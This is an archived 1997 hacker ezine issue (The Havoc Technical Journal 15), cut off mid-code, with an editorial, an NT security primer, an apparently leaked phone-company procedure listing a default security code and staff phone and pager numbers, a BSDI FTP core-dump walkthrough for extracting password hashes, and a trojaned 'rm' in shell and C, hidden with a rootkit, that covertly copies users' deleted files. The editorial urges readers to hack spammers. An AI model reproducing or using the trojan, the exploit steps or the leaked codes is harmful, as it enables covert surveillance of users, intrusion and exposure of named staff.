💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › THTJ › thtj15.t… captured on 2022-01-08 at 17:24:49.
View Raw
More Information
⬅️ Previous capture (2021-12-04)
-=-=-=-=-=-=-
������������������������������������������������������������������
�the havoc technical journal - http://www.thtj.com - ��
�������������������������������������������������������������������ٱ
��������������������������������������������������������������������
vol. 2 no. 3 issue 15 � October 1, 1997 � a thtj communications publication
������������������������������������������������������������������������������
��������������������������������������
-� the havoc technical journal issue 15 �-
����������������������������������������
Editorial..............................Scud-O
Windows NT Security Education Guide....NeonSurge
Single Access Serving System (SASS)....anonymous
BSDI FTP CORE DUMPS....................Bronc Buster
Security/Monitoring Tools..............Shok
Cryptanalytic Attacks..................The Messiah
Shadow files explained.................Shypht
SMTP server scanner....................memor
About The Internet Protocol............Malhavoc
ShokDial - a linux war dialer..........Shok
Under The Hood of Blowfish.............The Messiah
Learning to Count All Over Again.......Bronc Buster
scan.c.................................memor
Vuls in Solaris 2.5.1..................Shok
Operating Systems......................Fucking Hostile
Hacking your way to DOS................Devix
A phreak's dream come true.............Kode9
Rat Shak Shopping Made Easy............N-TREEG
Telephone Conferencing.................DataThief
How To Make A Cattleprod...............The Messiah
Securing Linux.........................KiDMaGiC
Social Insurance Numbers...............Devix
Stupid Unix Pranks.....................The Darkling
Oddville, THTJ.........................Scud-O
The News...............................KungFuFox
������������������������������������������������
��������������������������������������
� the NEW thtj.com �
� �������� �
� coming soon from thtj communications �
����������������������������������������
Shouts go out to all my people on the block:
The writers. You're the ones that make thtj run, and it is you that help to
keep the community informed. We owe you.
Other Shouts out go to:
All of #phreak, #hackers, #hackphreak,
#carparts, #linuxos, #phrack, (you all know who you are)
������������������������������������������������������������������������������
��������������������������������������
�the havoc technical journal - contacts�
����������������������������������������
- Editor in Chief : Scud-O, scud@thtj.com
- Assistant Editor : KungFuFox, mazer@cycat.com
- Submissions Editor: Keystroke, keystroke@thepentagon.com
- thtj email address: thtj@thtj.com
- thtj website: http://www.thtj.com/
- thtj mailing address: PO BOX 448 Sykesville, MD 21784
The Havoc Technical Journal Vol. 2, No.3, October 1, 1997.
A THTJ Communications publication. Contents Copyright (�)
1997 THTJ Communications. All Rights Reserved. No part of
this publication may be reproduced in whole or in part
without the expressed written consent of the Editor in Chief
of The Havoc Technical Journal. [No copying THTJ, damnit.]
The Havoc Technical Journal does in no way endorse the
illicit use of computers, computer networks, and
telecommunications networks, nor is it to be held liable
for any adverse results of pursuing such activities.
The articles provided in this magazine are without any
expressed or implied warranties. While every effort has been
taken to ensure the accuracy of the information contained in
this article, the authors, editors, and contributors of this
zine assume no responsibility for errors or omissions, or for
damages resulting from the use of the information contained
herein.
For infomation about using articles published in THTJ, send mail to:
e-mail: thtj@thtj.com � mail: THTJ PO Box 448 Sykesville, MD 21784
NOTICE: If you are an official of a government or an employee
of a government, you must register with THTJ before reading
any issue of this publication. A registration form will be
mailed to you free of charge by using either of the mailing
addresses above. Upon reception of this form you will be granted
privelege to read all issues of The Havoc Technical Journal.
Until you have registered, you are not authorized to read this
or any issues of THTJ.
������������������������������������������������������������������������������
Editorial
by Scud-O
The NEW thtj.
Well, with all great plans, the 'new thtj' that was scheduled for thtj14 is a
month late, and here it is. I hope you enjoy it. I personally think that this
is the best issue yet. This month as some of you know, I was fairly
intoxicated, and seriously looked into giving up thtj. However, thanks to all
of you out there, the staff of thtj communications, HBS, #phreak, the
writers, and the editors, it all came together, and so, here is thtj15,
bigger, badder, and kicking more ass.
This issue also marks a change that you may or may not have noticed.
thtj is now produced by thtj communications, inc. Havoc Bell Systems no
longer publishes thtj, since it seems that so many of you thought that you
had to be in HBS to write for thtj. This is entirely false. Anyone and
everyone is free to write for thtj. HBS is not dying, but we will hopefully
be able to focus more on group stuff, and less about thtj deadlines now that
thtj isn't officially in our hands..
The redesigned thtj.com site is about to be coming at you, with a lot
of new things that will hopefully make your life easier, and *gasp* more
complete. thtj.com is finally going to have a majordomo or two up, have some
e-mail forwarders for instant, easy access to current thtj issues, and
article submission information. The www site is also going to improve. A
bunch of you have said that the site is fairly lynx friendly, but it needs
work. Less graphics and more content are on their way, as are some new cgis,
wwwboards, and redesigned pages for distribution as well as submissions.
Last, but certainly not least, will be the new main page. I am adding site
links and info up top, so that all of you can skip over my rantings in the
message of the day section. I am also hoping to make a forum for everyone to
discuss their issues or problems with the community, so if you would like to
contribute to that, get a hold of me.
Finally this month, before I am done, I would like to talk with you
about some things that need to be done, and somethings I would like to see on
thtj.com. I have found various sources on the net for helping to block and
protect your site and your sendmail from spammers using your site as a
transfer site for their e-mail, to protect their servers from the flames. I
am going to be adding some code for this, and other security info for you,
since if you have a system up, you are just as curious about setting up
system security as you are breaking it up.
The reason I bring this all up is that spam is a serious problem.
Retards like the 'spam king' (who recently had his servers disconnected)
think that we all like having e-mail telling us about stupid products. The
fact that we all know is that no one wants this shit. If you own your own
domain you know about all this. You get hundreds of spam letters offering
'web registering services' and all the trash. We need to stop this, and we
would, or could, but losers like the aformentioned 'spam king' using many
servers to redirect their mail, and not let you know who the mail is from, so
you cannot ask him to stop. Securing your site with the code I talked about
is a step, but go beyond that. Spammers have ruined parts of the net, but not
all of it. Take action, strike back, hack them, harrass them, spam them, make
them learn to go fuck themselves. Well, thank you for the time it took you to
read may rants.
Scud-O , Founder, and Editor in Chief of THTJ
������������������������������������������
Scud-O and HBS would like to hear your views on this commentary.
Please feel free to e-mail us at: scud@thtj.com
----------------------------------------------
/ ---/ --/ / / | /------/ / /
/--- /-----/------/-----/ / / /
/----------/ /--------/
-of HAVOC Bell Systems-
scud@thtj.com � http://www.thtj.com
������������������������������������������������������������������������������
The Windows NT Security Education Guide (SEG) Part One
by NeonSurge of Shatter
(neonsurge@hotmail.com)
NT Security components and subsystem
The Logon Process
WinLogon
Users must log on to a Windows NT machine in order to use that NT based
machine or network. The logon process itself cannot be bypassed, it is
mandatory. Once the user has logged on, an access token is created (this
token will be discussed in more detail later). This token contains user
specific security information, such as: security identifier, group
identifiers, user rights and permissions. The user, as well as all processes
spawned by the user are identified to the system with this token.
The first step in the WinLogon process is something we are all familiar with,
CTRL+ALT+DEL. This is NT's default Security Attention Sequence (SAS - The SAS
key combo can be changed. We will also discuss that later.). This SAS is a
signal to the operating system that someone is trying to logon. After the
SAS is triggered, all user mode applications pause until the security
operation completes or is cancelled. (Note: The SAS is not just a logon
operation, this same key combination can be used for logging on, logging off,
changing a password or locking the workstation.) The pausing, or closing, of
all user mode applications during SAS is a security feature that most people
take for granted and dont understand. Due to this pausing of applications,
logon related trojan viruses are stopped, keyloggers (programs that run in
memory, keeping track of keystrokes, therefor recording someones password)
are stopped as well.
The user name is not case sensitive but the password is.
After typing in your information and clicking OK (or pressing enter), the
WinLogon process supplies the information to the security subsystem, which
in turn compares the information to the Security Accounts Manager (SAM). If
the information is compliant with the information in the SAM, an access token
is created for the user. The WinLogon takes the access token and passes it
onto the Win32 subsytem, which in turn starts the operating systems shell.
The shell, as well as all other spawned processes will receive a token. This
token is not only used for security, but also allows NTs auditing and logging
features to track user usage and access of network resources.
Note: All of the logon components are located in a file known as the
Graphical Indetification and Authentication (GINA) module, specifically
MSGINA.DLL. Under certain conditions, this file can be replaced, which is
how you would change the SAS key combination.
For fine tuning of the WinLogon process, you can refer to the registry. All
of the options for the WinLogon process are contained in the
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon area.
You can also fine tune the process by using the Policy Editor.
Logging on to a Domain
If an NT machine is a participant on a Domain, you would not only need to
login to the local machine, but the Domain as well. If a computer is a member
of a Domain, the WinLogon process is replaced by the NetLogon process.
Components
Local Security Authority (LSA): Also known as the security subsystem, it is
the central portion of NT security. It handles
local security policies and user
authentication. The LSA also handles
generating and logging audit messages.
Security Accounts Manager (SAM): The SAM handles user and group accounts, and
provides user authentication for the LSA.
Security Reference Monitor (SRM): The SRM is in charge of enforcing and
assuring access validation and auditing for
the LSA. It references user account
information as the user attempts to access
resources.
TCP/IP Security in NT
Note: This section is not meant to teach you the concepts behind the TCP/IP
protocol. It is assumed that a working knowledge of TCP/IP can be applied.
Windows NT has a built in TCP/IP security functionality that most
people do not use or know about. This functionality enables you to
control the types of network traffic that can reach your NT servers.
Access can be allowed or denied based on specific TCP ports, UDP
ports, and IP protocols. This type of security is normally applied to
servers connected directly to the internet, which is not recommended.
Do configure NT's built in TCP/IP security, follow these steps:
1 - Right click on Network Neighborhood and goto the properties
option.
2 - Select the Protocols tab, highlight TCP/IP and click on
Properties.
3 - Select the IP address tab of the TCP/IP properties screen.
4 - Check the check box that reads "Enable Security".
5 - Click on Configure
You should now be looking at the TCP/IP Security dialog, which has
the following options:
-Adapter: Specifies which of the installed network adapter cards you
are configuring
-TCP Ports
-UDP Ports
-IP Protocols
Within these settings, you would choose which ports and what access
permissions you would like to assign to those ports. The following
list is a list of the well known TCP/IP ports. This is not an in
depth guide, just a quick reference (For more details, check RFC 1060).
Service Port Comments
TCP Ports
echo 7/tcp
discard 9/tcp sink null
systat 11/tcp users
daytime 13/tcp
netstat 15/tcp
qotd 17/tcp quote
chargen 19/tcp ttytst source
ftp-data 20/tcp
ftp 21/tcp
telnet 23/tcp
smtp 25/tcp mail
time 37/tcp timserver
name 42/tcp nameserver
whois 43/tcp nicname
nameserver 53/tcp domain
apts 57/tcp any private terminal service
apfs 59/tcp any private file service
rje 77/tcp netrjs
finger 79/tcp
http 80/tcp
link 87/tcp ttylink
supdup 95/tcp
newacct 100/tcp [unauthorized use]
hostnames 101/tcp hostname
iso-tsap 102/tcp tsap
x400 103/tcp
x400-snd 104/tcp
csnet-ns 105/tcp CSNET Name Service
pop-2 109/tcp pop postoffice
sunrpc 111/tcp
auth 113/tcp authentication
sftp 115/tcp
uucp-path 117/tcp
nntp 119/tcp usenet readnews untp
ntp 123/tcp network time protocol
statsrv 133/tcp
profile 136/tcp
NeWS 144/tcp news
print-srv 170/tcp
exec 512/tcp remote process execution;
authentication performed using
passwords and UNIX loppgin names
login 513/tcp remote login a la telnet;
automatic authentication performed
based on priviledged port numbers
and distributed data bases which
identify "authentication domains"
cmd 514/tcp like exec, but automatic
authentication is performed as for
login server
printer 515/tcp spooler
efs 520/tcp extended file name server
tempo 526/tcp newdate
courier 530/tcp rpc
conference 531/tcp chat
netnews 532/tcp readnews
uucp 540/tcp uucpd
klogin 543/tcp
kshell 544/tcp krcmd
dsf 555/tcp
remotefs 556/tcp rfs server
chshell 562/tcp chcmd
meter 570/tcp demon
pcserver 600/tcp Sun IPC server
nqs 607/tcp nqs
mdqs 666/tcp
rfile 750/tcp
pump 751/tcp
qrh 752/tcp
rrh 753/tcp
tell 754/tcp send
nlogin 758/tcp
con 759/tcp
ns 760/tcp
rxe 761/tcp
quotad 762/tcp
cycleserv 763/tcp
omserv 764/tcp
webster 765/tcp
phonebook 767/tcp phone
vid 769/tcp
rtip 771/tcp
cycleserv2 772/tcp
submit 773/tcp
rpasswd 774/tcp
entomb 775/tcp
wpages 776/tcp
wpgs 780/tcp
mdbs 800/tcp
device 801/tcp
maitrd 997/tcp
busboy 998/tcp
garcon 999/tcp
blackjack 1025/tcp network blackjack
bbn-mmc 1347/tcp multi media conferencing
bbn-mmx 1348/tcp multi media conferencing
orasrv 1525/tcp oracle
ingreslock 1524/tcp
issd 1600/tcp
nkd 1650/tcp
dc 2001/tcp
mailbox 2004/tcp
berknet 2005/tcp
invokator 2006/tcp
dectalk 2007/tcp
conf 2008/tcp
news 2009/tcp
search 2010/tcp
raid-cc 2011/tcp raid
ttyinfo 2012/tcp
raid-am 2013/tcp
troff 2014/tcp
cypress 2015/tcp
cypress-stat 2017/tcp
terminaldb 2018/tcp
whosockami 2019/tcp
servexec 2021/tcp
down 2022/tcp
ellpack 2025/tcp
shadowserver 2027/tcp
submitserver 2028/tcp
device2 2030/tcp
blackboard 2032/tcp
glogger 2033/tcp
scoremgr 2034/tcp
imsldoc 2035/tcp
objectmanager 2038/tcp
lam 2040/tcp
interbase 2041/tcp
isis 2042/tcp
rimsl 2044/tcp
dls 2047/tcp
dls-monitor 2048/tcp
shilp 2049/tcp
NSWS 3049/tcp
rfa 4672/tcp remote file access server
complexmain 5000/tcp
complexlink 5001/tcp
padl2sim 5236/tcp
man 9535/tcp
UDP Ports
echo 7/udp
discard 9/udp sink null
systat 11/udp users
daytime 13/udp
netstat 15/udp
qotd 17/udp quote
chargen 19/udp ttytst source
time 37/udp timserver
rlp 39/udp resource
name 42/udp nameserver
whois 43/udp nicname
nameserver 53/udp domain
bootps 67/udp bootp
bootpc 68/udp
tftp 69/udp
sunrpc 111/udp
erpc 121/udp
ntp 123/udp
statsrv 133/udp
profile 136/udp
snmp 161/udp
snmp-trap 162/udp
at-rtmp 201/udp
at-nbp 202/udp
at-3 203/udp
at-echo 204/udp
at-5 205/udp
at-zis 206/udp
at-7 207/udp
at-8 208/udp
biff 512/udp used by mail system to notify users
of new mail received; currently
receives messages only from
processes on the same machine
who 513/udp maintains data bases showing who's
logged in to machines on a local
net and the load average of the
machine
syslog 514/udp
talk 517/udp like tenex link, but across
machine - unfortunately, doesn't
use link protocol (this is actually
just a rendezvous port from which a
tcp connection is established)
ntalk 518/udp
utime 519/udp unixtime
router 520/udp local routing process (on site);
uses variant of Xerox NS routing
information protocol
timed 525/udp timeserver
netwall 533/udp for emergency broadcasts
new-rwho 550/udp new-who
rmonitor 560/udp rmonitord
monitor 561/udp
meter 571/udp udemon
elcsd 704/udp errlog copy/server daemon
loadav 750/udp
vid 769/udp
cadlock 770/udp
notify 773/udp
acmaint_dbd 774/udp
acmaint_trnsd 775/udp
wpages 776/udp
puparp 998/udp
applix 999/udp Applix ac
puprouter 999/udp
cadlock 1000/udp
hermes 1248/udp
wizard 2001/udp curry
globe 2002/udp
emce 2004/udp CCWS mm conf
oracle 2005/udp
raid-cc 2006/udp raid
raid-am 2007/udp
terminaldb 2008/udp
whosockami 2009/udp
pipe_server 2010/udp
servserv 2011/udp
raid-ac 2012/udp
raid-cd 2013/udp
raid-sf 2014/udp
raid-cs 2015/udp
bootserver 2016/udp
bootclient 2017/udp
rellpack 2018/udp
about 2019/udp
xinupagesrver 2020/udp
xinuexpnsion1 2021/udp
xinuexpnsion2 2022/udp
xinuexpnsion3 2023/udp
xinuexpnsion4 2024/udp
xribs 2025/udp
scrabble 2026/udp
isis 2042/udp
isis-bcast 2043/udp
rimsl 2044/udp
cdfunc 2045/udp
sdfunc 2046/udp
dls 2047/udp
shilp 2049/udp
rmontor_scure 5145/udp
xdsxdm 6558/udp
isode-dua 17007/udp
The Nbtstat Command
This tool should be known, because it can give you tons of info about an NT
server. It can be used to query the network concerning netbios information.
It can also be useful for purging the netbios cache and reloading the LMHOSTS
file. This one command can be extremely useful when performing security
audits. When one knows how to interpret the information, it can reveal more
than one might think.
Usage: nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] [-s]
[interval]
Switches -a Lists the remote computer's name table given its host
name.
-A Lists the remote computer's name table given its IP
address.
-c Lists the remote name cache including the IP addresses.
Lists the remote name cache including the IP
addresses Lists local NetBIOS names. Lists names
resolved by broadcast and via WINS Purges and reloads
the remote cache name table Lists sessions table with
the destination IP addresses.
Lists sessions table converting destination IP
addresses to host names via the hosts file.
-n Lists local NetBIOS names.
-r Lists names resolved by broadcast and via WINS.
-R Purges and reloads the remote cache name table.
-S Lists sessions table with the destination IP addresses.
-s Lists sessions table converting destination IP
addresses to host names via the hosts file.
interval This will redisplay the selected statistics,
pausing for the number of seconds you choose
as "interval" between each listing.
Press CTRL+C to stop.
Notes on NBTSTAT
The column headings generated by NBTSTAT have the following meanings:
Input
Number of bytes received.
Output
Number of bytes sent.
In/Out
Whether the connection is from the computer (outbound) or from another
system to the local computer (inbound).
Life
The remaining time that a name table cache entry will "live" before your
computer purges it.
Local Name
The local NetBIOS name given to the connection.
Remote Host
The name or IP address of the remote host.
Type
A name can have one of two types: unique or group.
The last byte of the 16 character NetBIOS name often means something
because the same name can be present multiple times on the same computer.
This shows the last byte of the name converted into hex.
State
Your NetBIOS connections will be shown in one of the following "states":
State Meaning
Accepting An incoming connection is in process.
Associated The endpoint for a connection has been created and
your computer has ssociated it with an IP address.
Connected This is a good state! It means you're connected to the
remote resource.
Connecting Your session is trying to resolve the name-to-IP
address mapping of the destination resource.
Disconnected Your computer requested a disconnect, and it is waiting
for the remote computer to do so.
Disconnecting Your connection is ending.
Idle The remote computer has been opened in the current
session, but is currently not accepting connections.
Inbound An inbound session is trying to connect.
Listening The remote computer is available.
Outbound Your session is creating the TCP connection.
Reconnecting If your connection failed on the first attempt, it will
display this state as it tries to reconnect.
16th Byte character Values for NetBios names
<00> Workstation service name
<03> Messenger service name
<1B> Domain Master Browser name
<06> RAS Server service
<1F> NetDDE service
<20> Server service name
<21> RAS Client
<BE> Network monitor agent
<BF> Network monitor utility
<1C> Domain group name
<1D> Master browser name
<1E> Normal group name
_MSBROWSE_ Domain master browser
The messenger service name <03> will give you the name of any users currently
logged onto that machine, including the administrator account name.
Thats about it for part one. Look out for future releases. Question or
Comments to NeonSurge@hotmail.com
������������������������������������������������������������������������������
Single Access Serving System (SASS)
(anonymous)
PROCESS
DOCUMENTATION
Santa Ana, April 8, 1997
SUBJECT
Single Access Serving System (SASS).
REASON FOR ISSUANCE
This document will provide an EM Communication Technician with installation
procedures for the Single Access Serving System (SASS)
SWITCH TYPES AFFECTED
5ESS, DMS100 and 1AESS
GENERIC/BCS REQUIRED
None
WORK FUNCTIONS AFFECTED
Local Field Operations (LFO) EM Communication Technicians
EFFECTIVE / CRITICAL DATES
Effective immediately.
TRACKING CODE
Baseline
QUESTIONS
Questions regarding this document may be directed to Michele Baker at (714)
430-6640
GENERAL INFORMATION
SASS is a transmission conditioning unit, a printed wiring card that employs
a microprocessor control of test functions and provides voice prompting. The
card is installed in an MFT bay and connected to the switch through an
outgoing trunk. A dedicated POTS line is required for the ringback feature.
This Single Serving Access System will allow both outside field technicians
as well as LFO technicians the ability to perform multiple test functions
using one access number.
The Unit Test Features are:
- ANI
- Single Tone Generation
- Three Tone slope
- Ten Tone Slope
- Full Tone Sweep
- Caller ID Transmission
- Data Sweep
- Quiet Termination
- Keypad Test
CENTRAL OFFICE (CO)
REQUIREMENTS
1. An MFT slot
2. An outgoing trunk OR A D4 port equipped with a DPT Channel Unit.
3. A new Trunk Group assignment will be established
4. The SASS Access Number wil need to be route indexed to the trunk or port
assigned.
5. Assignment and cross connect to a POTS line for ringback capabilities.
CENTRAL OFFICE (CO)
PROCESS (1) Wiring the Circuit
1. You will receive two service orders for your SASS circuit. One for the
design itself (se word) and one for the POTS line (1ML) associated with it.
The POTS order will consist of only an OE assignment used for ringback
capabilities.
NOTE 1) The design portion of your order will resemble a DID circuit.
NOTE 2) Every effort will be made to use a digital trunk assignment,
however, if none are available, an analog trunk will be used in its
place.
NOTE 3) Make sure the channel unit used in the circuit is a D4CD200
(terminating).
CENTRAL OFFICE (CO)
PROCESS (2) Installing and Optioning The Channel Unit
Install the SASS Unit into the designated MFT slot. Once the plug-in has
been installed it should be optioned according to the manufacturers
instructions on the card.
CENTRAL OFFICE (CO)
PROCESS (3) Initial Power-Up Verification
Once the SASS unit is installed and optioned the Initial Power-up
verification must be performed at the unit itself.
CENTRAL OFFICE (CO)
PROCESS (4) Procedure for Setting Transmission Levels
Once the SASS unit has passed the Initial Power-up verification the
Transmission Levels must be set for the unit. The following is the procedure
for setting transmission levels on a newly installed SASS Unit. This
function must be performed at the mainframe to any pair assigned to an OE in
the respective switch in which the SASS unit was installed. The pair must be
open and the reading taken toward the line card.
STEP ACTION
1 At the mainframe, remove the coils from any working pair assigned to an OE
in the respective switch.
2 Draw dial tone on the OE side of the open and dial the SASS access number.
3 Enter the SASS Security Code after the number announcement. The default
Security Code is 222-2222.
4 Press 3 to Read or Change Prefixes
5 Press 5 to Generate Test Tone.
6 Enter * to Generate System Tone
7 Measure Tone with a transmission measurement test set. Should measure a
level of 0dbBRNC.
NOTE 1) Adjustments may be made by; entering a 6 to increase level by 0.1 dB
each time the 6 is depressed, or entering 7 to decrease the level by 0.1 dB
each time the 7 is depressed.
8 When you have completed setting the db levels, hangup to terminate the
call.
9 A test must be performed on least three (3) prefixes to determine whether
the db levels were set correctly in all prefixes.. A deviation of + or
-1/2 db is acceptable. If tests reveal any variance greater than + or -1/2
db, you must repeat the procedure for Setting Tranmission Levels for every
prefix.
CENTRAL OFFICE (CO)
PROCESS (5) Testing The Newly Installed SASS Unit
When the SASS installation is complete, call the Test System Health Group to
test the newly installed unit. They will in turn close the order out with
OCS.
CENTRAL OFFICE (CO)
PROCESS (6) Troubleshooting A Newly Installed SASS Unit
When the SASS installation is complete, the Initial Power-up verification has
been performed, the transmission levels have been set and your circuit is
still not turned up, try the following troubleshooting procedures.
CENTRAL OFFICE (CO)
PROCESS (7) Who To Call When You Have Questons Concerning:
Closing out your order Test System Health Group
SASS Project SASS Project Team
Word order asignments FACS Administrator
Spares PICS
Test coordination Test System Health Group
Translations NTG
This document PP&STM
Trunk Assignments NTG
CONTACT NUMBERS
NTG
- South Trouble Desk (619) 886-1988
- North Trouble Desk (916) xxx-xxxx
PADS
- South (619) 886-1988
- North (916) xxx-xxxx
PICS
- (not provided)
Process, Product & System Technical Management (PP&STM)
- Michele Baker Voice/Voice mail (714) 430-6640
Pager Number (714) 755-8424
Test System Health Group
- (Statewide) Voice (800) 694-4732
SASS Project Team
- Bruce Poole Voice/Voice mail (209) 454-3197
Pager Number (510) 904-7574
REFERENCES
Harris
Dracon Division
Single Access Serving System (SASS)
Transmission Condititoning Unit
Model 24800-300
Service Manual
011-724800-300 (Issue 3 2/94)
Harris (Addendum)
Dracon Division
SASS
Transmission Condititoning Unit
Model 24800-300
Service Manual
011-724209-001 (Issue 5 6/96)
Questions?
At what point will I know that translations are typed in.
At what point does the ntec ask the ess to idle trunk? Before setting levels.
������������������������������������������������������������������������������
BSDI FTP CORE DUMPS
by Bronc Buster
(www.showdown.org)
(bbuster@succeed.net)
It was over a year ago that I first reported my findings to BugTraqs,
BSDI, and CERT about the potential security holes with BSDs core dumping
problems. On the day of 3 Sept 97 BSDI finaly released a patch for this
hole, but as most of you know, most SysAdmins don't keep track of patchs
and their release dates because everyone alawys thinks they are immune
to attack.
This hole uses the massive built in feature on BSD systems that they use
to make their Unix version more stable and less prevy to crashing, Core
Dumps. By useing this function to force a core dump after accessing the
password file you will be able to retreve encrypted passwords from the
core dump. This only works on BSDI BSD/OS 2.X and NOT BSD 3.X.
How it works: you FTP in as a legit user, then stop the process and then
kill it forcing a core dump. By forcing the dump after the FTP program
(wu ftpd 2.4 used) has accessed the password file it will dump the stack
and all the information in it to a core dump file owned by that user in
the present working directory. I think the commands for this exploit are
very easy to understand and are self explaintory.
main: {1} % ftp succeed.net // FTP to localhost
Connected to succeed.net.
220 main.succeed.net FTP server
(Version wu-2.4(2) Tue Jan 7 08:37:31 EST 1997)
ready.
Name (succeed.net:bbuster): bbuster // Login as a user
331 Password required for bbuster.
Password:
230 User bbuster logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ^Z // Control Z and suspend it
Suspended
main: {2} % ps // Find PID number of FTP
PID TT STAT TIME COMMAND
23875 p2 Is 0:00.13 -csh (csh)
23967 p2 S+ 0:00.03 telnet localhost
23969 p3 Ss 0:00.10 -csh (csh)
23978 p3 T 0:00.02 ftp succeed.net
23989 p3 R+ 0:00.01 ps
main: {3} % kill -11 23978 // Kill -11 the FTP process
main: {4} % fg // Call FTP back to Foreground
ftp succeed.net
Segmentation fault (core dumped) // Dump the core
main: {5} % strings ftp.core > test // Stings it to a file for reading
main: {6} % cat test // Get the passwords
That's it. This is not the only problem with BSDI BSD/OS systems
and their core dumps, there was the well known write tty core dump
which essentialy did the same thing as this exploit does, but it was
patched much faster.
Over all BDSI BSD/OS, all versions, are one of the most secure Unix
systems on the market today and when an exploit is found for it we
must treat it like gold as BSDI is usualy very fast is fixing them.
Bronc Buster!!!
[EOF]
������������������������������������������������������������������������������
Security/Monitoring tools
by Shok
(shok@sekurity.org)
Okay, well........welcome to this thing......by Shok.
What I plan for this to be, is some various utilities that you might think
as of use and what not. This is mainly a few security tips that I like to
use.
First off, edit your /etc/profile, and add the line:
export HISTFILE=/tmp/hist/`whoami`
and then do:
mkdir /tmp/hist;chmud 1777 /tmp/hist
You now want to hide that file, so the users don't see the dir (it can be
seen with set but not too many people check :) and you hide it with the
rootkit's ls.
Another few things I like to do.
I made a trojaned 'rm' that basically calls /bin/rm.bak which is hidden
(via rootkit ls), and it copies the file they are trying to delete to
/tmp/fill (which is also hidden via rootkit ls).
There are two versions of this....I wrote the first one in shell script,
but do to the fact it has to be a+r, I wrote it in C afterwords. Here is
the rm.sh:
#!/bin/sh
# rm.sh -- rm "trojan" by (--==+*~Shok~*+==--)
#
# Email: shok@sekurity.org
if [ $# > 1 ]
then
case $1 in
-i)
shift
cp -f $* /tmp/fill &>/dev/null
doexec /bin/rm.bak rm -i $*
;;
--interactive)
shift
cp -f $* /tmp/fill &>/dev/null
doexec /bin/rm.bak rm -i $*
;;
-f)
shift
cp -f $* /tmp/fill &>/dev/null
/bin/rm.bak -f $*
;;
--force)
shift
cp -f $* /tmp/fill &>/dev/null
/bin/rm.bak -f $*
;;
-d)
shift
cp $1/* /tmp/fill &>/dev/null
/bin/rm.bak -d $*
;;
--directory)
shift
cp $1/* /tmp/fill &>/dev/null
/bin/rm.bak -d $*
;;
-v)
shift
cp -f $* /tmp/fill &>/dev/null
/bin/rm.bak -v $*
;;
--verbose)
shift
cp -f $* /tmp/fill &>/dev/null
/bin/rm.bak -v $*
;;
-r)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -R $*
;;
-R)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -R $*
;;
--recursive)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -R $*
;;
-ri)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -ri $*
;;
-Ri)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -ri $*
;;
-rf)
shift
cp -f $1/* /tmp/fill &>/dev/null
cp -f $1 /tmp/fill &>/dev/null
/bin/rm.bak -rf $*
;;
-Rf)
shift
cp -f $1/* /tmp/fill &>/dev/null
cp -f $1 /tmp/fill &>/dev/null
/bin/rm.bak -rf $*
;;
-rd)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -rd $*
;;
-Rd)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -rd $*
;;
-Rv)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -rv $*
;;
-rv)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -rv $*
;;
-fv)
shift
cp -f $1 /tmp/fill &>/dev/null
/bin/rm.bak -fv $*
;;
-Rfv)
shift
cp -f $1/* /tmp/fill &>/dev/null
cp -f $1 /tmp/fill &>/dev/null
/bin/rm.bak -rfv $*
;;
-rfv)
shift
cp -f $1/* /tmp/fill &>/dev/null
cp -f $1 /tmp/fill &>/dev/null
/bin/rm.bak -rfv $*
;;
cp -f $* /tmp/fill &>/dev/null
/bin/rm.bak $*
;;
esac
else
IT=$1
cp -f $IT /tmp/fill
/bin/rm.bak $IT
fi
#----------------------------------------------------
You may have to change the line:
doexec /bin/rm.bak -i $*
to:
/bin/rm.bak -i $*
if you do not have doexec which is on linux (or redhat anyway)
Now for rm.c:
/* ------------------------------------------------------ */
/* rm.c -- rm "trojan" by (--==+*~Shok~*+==--) */
/* ------------------------------------------------------ */
/* Email: shok@sekurity.org */
#include <sys/stat.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void main(int argc, char **argv)
{
struct stat filestats;
int i;
if (argc > 2)
{
if (strcmp("-i", argv[1])==0) goto interactive;
if (strcmp("-f", argv[1])==0) goto force;
if (strcmp("-v", argv[1])==0) goto verbose;
if (strcmp("-r", argv[1])==0) goto recursive;
if (strcmp("-rf", argv[1])==0) goto rf;
if (strcmp("-ri", argv[1])==0) goto ri;
if (strcmp("-rv", argv[1])==0) goto rv;
if (strcmp("-rvf", argv[1])==0) goto rfv;
if (strcmp("-rfv", argv[1])==0) goto rfv;
if (strcmp("-Rvf", argv[1])==0) goto rfv;
if (strcmp("-Rfv", argv[1])==0) goto rfv;
if (strcmp("-frv", argv[1])==0) goto rfv;
if (strcmp("-fvr", argv[1])==0) goto rfv;
if (strcmp("-fRv", argv[1])==0) goto rfv;
if (strcmp("-fvR", argv[1])==0) goto rfv;
if (strcmp("-vfr", argv[1])==0) goto rfv;
if (strcmp("-vrf", argv[1])==0) goto rfv;
if (strcmp("-vfR", argv[1])==0) goto rfv;
if (strcmp("-vRf", argv[1])==0) goto rfv;
if (strcmp("-fr", argv[1])==0) goto rf;
if (strcmp("-ir", argv[1])==0) goto ri;
if (strcmp("-vr", argv[1])==0) goto rv;
if (strcmp("--interactive", argv[1])==0) goto interactive;
if (strcmp("--force", argv[1])==0) goto force;
if (strcmp("--verbose", argv[1])==0) goto verbose;
if (strcmp("--recursive", argv[1])==0) goto recursive;
}
else {
setenv("PROGRAM", argv[1], 1);
system("cp -f $PROGRAM /tmp/fill &>/dev/null");
system("/bin/rm.bak $PROGRAM");
unsetenv("PROGRAM");
}
interactive:
lstat(argv[2], &filestats);
for (i=2;i<argc;i++)
{
if (S_ISDIR(filestats.st_mode))
{
setenv("PROGRAM", argv[i], 2);
system("cp -f $PROGRAM/* /tmp/fill &>/dev/null");
unsetenv("PROGRAM");
execl("/bin/rm.bak","rm","-i",argv[2],NULL);
}
else
{
